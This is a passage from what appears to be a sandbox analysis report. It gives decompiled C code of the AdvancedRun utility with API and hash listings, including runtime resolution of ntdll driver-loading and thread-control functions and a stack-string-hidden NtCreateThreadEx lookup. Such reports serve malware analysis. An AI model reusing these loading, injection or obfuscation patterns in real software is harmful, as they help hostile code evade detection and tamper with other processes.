                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t47 = _a4 - 0x110;
                                                                                                                				_t117 = __ecx;
                                                                                                                				if(_t47 == 0) {
                                                                                                                					__eflags =  *0x40feb0;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
                                                                                                                					} else {
                                                                                                                						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                                                                						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                                                                					}
                                                                                                                					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
                                                                                                                					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                                                                					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                                                                					E0040103E(_t117, __eflags);
                                                                                                                					E00404DA9(_t106,  *(_t117 + 0x10), 4);
                                                                                                                					goto L30;
                                                                                                                				} else {
                                                                                                                					_t61 = _t47 - 1;
                                                                                                                					if(_t61 == 0) {
                                                                                                                						_t103 = _a8;
                                                                                                                						_t63 = _t103 >> 0x10;
                                                                                                                						__eflags = _t103 - 1;
                                                                                                                						if(_t103 == 1) {
                                                                                                                							L24:
                                                                                                                							__eflags = _t63;
                                                                                                                							if(_t63 != 0) {
                                                                                                                								goto L30;
                                                                                                                							} else {
                                                                                                                								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                                                                								DeleteObject( *(_t117 + 0x43c));
                                                                                                                								goto L8;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							__eflags = _t103 - 2;
                                                                                                                							if(_t103 != 2) {
                                                                                                                								goto L30;
                                                                                                                							} else {
                                                                                                                								goto L24;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t68 = _t61 - 0x27;
                                                                                                                						if(_t68 == 0) {
                                                                                                                							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                							__eflags = _a12 - _t69;
                                                                                                                							if(_a12 != _t69) {
                                                                                                                								__eflags =  *0x40ff30;
                                                                                                                								if( *0x40ff30 == 0) {
                                                                                                                									goto L30;
                                                                                                                								} else {
                                                                                                                									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                									__eflags = _a12 - _t70;
                                                                                                                									if(_a12 != _t70) {
                                                                                                                										goto L30;
                                                                                                                									} else {
                                                                                                                										goto L18;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								L18:
                                                                                                                								SetBkMode(_a8, 1);
                                                                                                                								SetTextColor(_a8, 0xc00000);
                                                                                                                								_t56 = GetSysColorBrush(0xf);
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t73 = _t68 - 0xc8;
                                                                                                                							if(_t73 == 0) {
                                                                                                                								_t74 = _a12;
                                                                                                                								_t96 = _t74 & 0x0000ffff;
                                                                                                                								_v12.x = _t96;
                                                                                                                								_v12.y = _t74 >> 0x10;
                                                                                                                								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                								_push(_v12.y);
                                                                                                                								_a8 = _t76;
                                                                                                                								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                                                                								__eflags = _t77 - _a8;
                                                                                                                								if(_t77 != _a8) {
                                                                                                                									__eflags =  *0x40ff30;
                                                                                                                									if( *0x40ff30 == 0) {
                                                                                                                										goto L30;
                                                                                                                									} else {
                                                                                                                										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                										_push(_v12.y);
                                                                                                                										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                                                                										__eflags = _t79 - _t78;
                                                                                                                										if(_t79 != _t78) {
                                                                                                                											goto L30;
                                                                                                                										} else {
                                                                                                                											goto L13;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									L13:
                                                                                                                									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                                                									goto L8;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								if(_t73 != 0) {
                                                                                                                									L30:
                                                                                                                									_t56 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                								} else {
                                                                                                                									_t85 = _a12;
                                                                                                                									_t98 = _t85 & 0x0000ffff;
                                                                                                                									_v12.x = _t98;
                                                                                                                									_v12.y = _t85 >> 0x10;
                                                                                                                									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                									_push(_v12.y);
                                                                                                                									_a8 = _t87;
                                                                                                                									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                                                                										__eflags =  *0x40ff30;
                                                                                                                										if( *0x40ff30 == 0) {
                                                                                                                											goto L30;
                                                                                                                										} else {
                                                                                                                											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                											_push(_v12.y);
                                                                                                                											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                                                                											__eflags = _t90 - _t89;
                                                                                                                											if(_t90 != _t89) {
                                                                                                                												goto L30;
                                                                                                                											} else {
                                                                                                                												_push(0x40ff30);
                                                                                                                												goto L7;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_push(_t117 + 0x23e);
                                                                                                                										L7:
                                                                                                                										_push( *(_t117 + 0x10));
                                                                                                                										E00404F7E();
                                                                                                                										L8:
                                                                                                                										_t56 = 1;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t56;
                                                                                                                			}




























                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                • String ID: AdvancedRun
                                                                                                                • API String ID: 829165378-481304740
                                                                                                                • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408E31() {
                                                                                                                				void* _t1;
                                                                                                                				struct HINSTANCE__* _t2;
                                                                                                                				_Unknown_base(*)()* _t14;
                                                                                                                
                                                                                                                				if( *0x41c4ac == 0) {
                                                                                                                					_t2 = GetModuleHandleW(L"ntdll.dll");
                                                                                                                					 *0x41c4ac = _t2;
                                                                                                                					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
                                                                                                                					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
                                                                                                                					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
                                                                                                                					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
                                                                                                                					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
                                                                                                                					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
                                                                                                                					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
                                                                                                                					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
                                                                                                                					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
                                                                                                                					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
                                                                                                                					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
                                                                                                                					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
                                                                                                                					 *0x41c4a8 = _t14;
                                                                                                                					return _t14;
                                                                                                                				}
                                                                                                                				return _t1;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                • API String ID: 667068680-4280973841
                                                                                                                • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                                                                				void _v259;
                                                                                                                				void _v260;
                                                                                                                				void _v515;
                                                                                                                				void _v516;
                                                                                                                				char _v1048;
                                                                                                                				void _v1052;
                                                                                                                				void _v1056;
                                                                                                                				void _v1560;
                                                                                                                				long _v1580;
                                                                                                                				void _v3626;
                                                                                                                				char _v3628;
                                                                                                                				void _v5674;
                                                                                                                				char _v5676;
                                                                                                                				void _v9770;
                                                                                                                				short _v9772;
                                                                                                                				void* __edi;
                                                                                                                				void* _t45;
                                                                                                                				void* _t60;
                                                                                                                				int _t61;
                                                                                                                				int _t63;
                                                                                                                				int _t64;
                                                                                                                				long _t68;
                                                                                                                				struct HWND__* _t94;
                                                                                                                				signed int _t103;
                                                                                                                				intOrPtr _t127;
                                                                                                                				unsigned int _t130;
                                                                                                                				void* _t132;
                                                                                                                				void* _t135;
                                                                                                                
                                                                                                                				E0040B550(0x2628, __ecx);
                                                                                                                				_t45 = _a8 - 0x110;
                                                                                                                				if(_t45 == 0) {
                                                                                                                					E00404DA9(__edx, _a4, 4);
                                                                                                                					_v9772 = 0;
                                                                                                                					memset( &_v9770, 0, 0xffe);
                                                                                                                					_t103 = 5;
                                                                                                                					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                                                                					memset( &_v1560, 0, 0x1f6);
                                                                                                                					_v260 = 0;
                                                                                                                					memset( &_v259, 0, 0xff);
                                                                                                                					_v516 = 0;
                                                                                                                					memset( &_v515, 0, 0xff);
                                                                                                                					_v5676 = 0;
                                                                                                                					memset( &_v5674, 0, 0x7fe);
                                                                                                                					_v3628 = 0;
                                                                                                                					memset( &_v3626, 0, 0x7fe);
                                                                                                                					_t135 = _t132 + 0x5c;
                                                                                                                					_t60 = GetCurrentProcess();
                                                                                                                					_t105 =  &_v260;
                                                                                                                					_a8 = _t60;
                                                                                                                					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
                                                                                                                					__eflags = _t61;
                                                                                                                					if(_t61 != 0) {
                                                                                                                						E00404FE0( &_v5676,  &_v260, 4);
                                                                                                                						_pop(_t105);
                                                                                                                					}
                                                                                                                					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
                                                                                                                					__eflags = _t63;
                                                                                                                					if(_t63 != 0) {
                                                                                                                						E00404FE0( &_v3628,  &_v516, 0);
                                                                                                                						_pop(_t105);
                                                                                                                					}
                                                                                                                					_t64 = E00404BD3();
                                                                                                                					__eflags = _t64;
                                                                                                                					if(_t64 == 0) {
                                                                                                                						E004090EE();
                                                                                                                					} else {
                                                                                                                						E00409172();
                                                                                                                					}
                                                                                                                					__eflags =  *0x4101b8;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						L17:
                                                                                                                						_v1056 = 0;
                                                                                                                						memset( &_v1052, 0, 0x218);
                                                                                                                						_t127 =  *0x40f5d4; // 0x0
                                                                                                                						_t135 = _t135 + 0xc;
                                                                                                                						_t68 = GetCurrentProcessId();
                                                                                                                						_push(_t127);
                                                                                                                						_push(_t68);
                                                                                                                						 *0x40f84c = 0;
                                                                                                                						E004092F0(_t105, __eflags);
                                                                                                                						__eflags =  *0x40f84c; // 0x0
                                                                                                                						if(__eflags != 0) {
                                                                                                                							memcpy( &_v1056, 0x40f850, 0x21c);
                                                                                                                							_t135 = _t135 + 0xc;
                                                                                                                							__eflags =  *0x40f84c; // 0x0
                                                                                                                							if(__eflags != 0) {
                                                                                                                								wcscpy( &_v1580, E00404B3E( &_v1048));
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L20;
                                                                                                                					} else {
                                                                                                                						__eflags =  *0x4101bc;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							L20:
                                                                                                                							_push( &_v3628);
                                                                                                                							_push( &_v5676);
                                                                                                                							_push( *0x40f3b0);
                                                                                                                							_push( *0x40f3bc);
                                                                                                                							_push( *0x40f3ac);
                                                                                                                							_push( *0x40f394);
                                                                                                                							_push( *0x40f398);
                                                                                                                							_push( *0x40f3a0);
                                                                                                                							_push( *0x40f3a4);
                                                                                                                							_push( *0x40f39c);
                                                                                                                							_push( *0x40f3a8);
                                                                                                                							_push( &_v1580);
                                                                                                                							_push( *0x40f5d4);
                                                                                                                							_push( *0x40f5c8);
                                                                                                                							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                                                                							_push(0x800);
                                                                                                                							_push( &_v9772);
                                                                                                                							L0040B1EC();
                                                                                                                							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                                                                							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                                                							L21:
                                                                                                                							return 0;
                                                                                                                						}
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(_t45 == 1) {
                                                                                                                					_t130 = _a12;
                                                                                                                					if(_t130 >> 0x10 == 0) {
                                                                                                                						if(_t130 == 3) {
                                                                                                                							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                                                                							_a4 = _t94;
                                                                                                                							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                                                                							SendMessageW(_a4, 0x301, 0, 0);
                                                                                                                							SendMessageW(_a4, 0xb1, 0, 0);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L21;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • {Unknown}, xrefs: 00408BA5
                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0040B04D(intOrPtr* __edi, short* _a4) {
                                                                                                                				int _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				int _v20;
                                                                                                                				long _v60;
                                                                                                                				char _v572;
                                                                                                                				void* __esi;
                                                                                                                				int _t47;
                                                                                                                				void* _t50;
                                                                                                                				signed short* _t76;
                                                                                                                				void* _t81;
                                                                                                                				void* _t84;
                                                                                                                				intOrPtr* _t96;
                                                                                                                				int _t97;
                                                                                                                
                                                                                                                				_t96 = __edi;
                                                                                                                				_t97 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
                                                                                                                				_v8 = _t47;
                                                                                                                				if(_t47 > 0) {
                                                                                                                					_t50 = E00405AA7(__edi);
                                                                                                                					_push(_v8);
                                                                                                                					L0040B26C();
                                                                                                                					_t84 = _t50;
                                                                                                                					GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                                                                					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                                                                						_t81 = _v12;
                                                                                                                						_t11 = _t81 + 0x30; // 0x4d46e853
                                                                                                                						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                                                                						_t13 = _t81 + 8; // 0x8d50ffff
                                                                                                                						 *__edi =  *_t13;
                                                                                                                						_t14 = _t81 + 0x14; // 0x5900004d
                                                                                                                						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                                                                						_t16 = _t81 + 0x10; // 0x65e850ff
                                                                                                                						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                                                                						_t18 = _t81 + 0x24; // 0xf4680000
                                                                                                                						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                                                                						_t20 = _t81 + 0x28; // 0xbb0040cd
                                                                                                                						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                                                                					}
                                                                                                                					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
                                                                                                                						L5:
                                                                                                                						wcscpy( &_v60, L"040904E4");
                                                                                                                					} else {
                                                                                                                						_t76 = _v16;
                                                                                                                						_push(_t76[1] & 0x0000ffff);
                                                                                                                						_push( *_t76 & 0x0000ffff);
                                                                                                                						_push(L"%4.4X%4.4X");
                                                                                                                						_push(0x14);
                                                                                                                						_push( &_v60);
                                                                                                                						L0040B1EC();
                                                                                                                						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
                                                                                                                					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
                                                                                                                					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
                                                                                                                					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
                                                                                                                					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
                                                                                                                					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
                                                                                                                					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
                                                                                                                					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
                                                                                                                					_push(_t84);
                                                                                                                					_t97 = 1;
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				return _t97;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                • wcscpy.MSVCRT ref: 0040B128
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                • API String ID: 1223191525-1542517562
                                                                                                                • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0040A1EF(struct HINSTANCE__** __esi) {
                                                                                                                				char _v8;
                                                                                                                				char _v9;
                                                                                                                				char _v10;
                                                                                                                				char _v11;
                                                                                                                				char _v12;
                                                                                                                				char _v13;
                                                                                                                				char _v14;
                                                                                                                				char _v15;
                                                                                                                				char _v16;
                                                                                                                				char _v17;
                                                                                                                				char _v18;
                                                                                                                				char _v19;
                                                                                                                				char _v20;
                                                                                                                				char _v21;
                                                                                                                				char _v22;
                                                                                                                				char _v23;
                                                                                                                				char _v24;
                                                                                                                				struct HINSTANCE__* _t27;
                                                                                                                
                                                                                                                				if( *__esi != 0) {
                                                                                                                					L3:
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                				_t27 = LoadLibraryW(L"ntdll.dll");
                                                                                                                				 *__esi = _t27;
                                                                                                                				if(_t27 != 0) {
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosw");
                                                                                                                					asm("stosb");
                                                                                                                					_v24 = 0x4e;
                                                                                                                					_v23 = 0x74;
                                                                                                                					_v13 = 0x65;
                                                                                                                					_v12 = 0x61;
                                                                                                                					_v18 = 0x74;
                                                                                                                					_v17 = 0x65;
                                                                                                                					_v22 = 0x43;
                                                                                                                					_v14 = 0x72;
                                                                                                                					_v11 = 0x64;
                                                                                                                					_v21 = 0x72;
                                                                                                                					_v10 = 0x45;
                                                                                                                					_v9 = 0x78;
                                                                                                                					_v20 = 0x65;
                                                                                                                					_v19 = 0x61;
                                                                                                                					_v16 = 0x54;
                                                                                                                					_v15 = 0x68;
                                                                                                                					_v8 = 0;
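                                                                                                                					// The byte assignments above fill _v24.._v8 with the NUL-terminated stack string "NtCreateThreadEx".
                                                                                                                					__esi[1] = GetProcAddress(_t27,  &_v24);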
                                                                                                                					goto L3;
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                • API String ID: 2574300362-1257427173
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 63%
                                                                                                                			E00407F8D(void* __eax) {
                                                                                                                				struct _SHFILEINFOW _v692;
                                                                                                                				void _v1214;
                                                                                                                				short _v1216;
                                                                                                                				void* _v1244;
                                                                                                                				void* _v1248;
                                                                                                                				void* _v1252;
                                                                                                                				void* _v1256;
                                                                                                                				void* _v1268;
                                                                                                                				void* _t37;
                                                                                                                				long _t38;
                                                                                                                				long _t46;
                                                                                                                				long _t48;
                                                                                                                				long _t58;
                                                                                                                				void* _t62;
                                                                                                                				intOrPtr* _t64;
                                                                                                                
                                                                                                                				_t64 = ImageList_Create;
                                                                                                                				_t62 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
                                                                                                                					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
                                                                                                                						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                                                						 *(_t62 + 0x2a8) = _t48;
                                                                                                                						__imp__ImageList_SetImageCount(_t48, 0);
                                                                                                                						_push( *(_t62 + 0x2a8));
                                                                                                                					} else {
                                                                                                                						_v692.hIcon = 0;
                                                                                                                						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                                                                						_v1216 = 0;
                                                                                                                						memset( &_v1214, 0, 0x208);
                                                                                                                						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                                                                						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
                                                                                                                						 *(_t62 + 0x2a8) = _t58;
                                                                                                                						_push(_t58);
                                                                                                                					}
                                                                                                                					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
                                                                                                                					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                                                                					 *(_t62 + 0x2ac) = _t46;
                                                                                                                					__imp__ImageList_SetImageCount(_t46, 0);
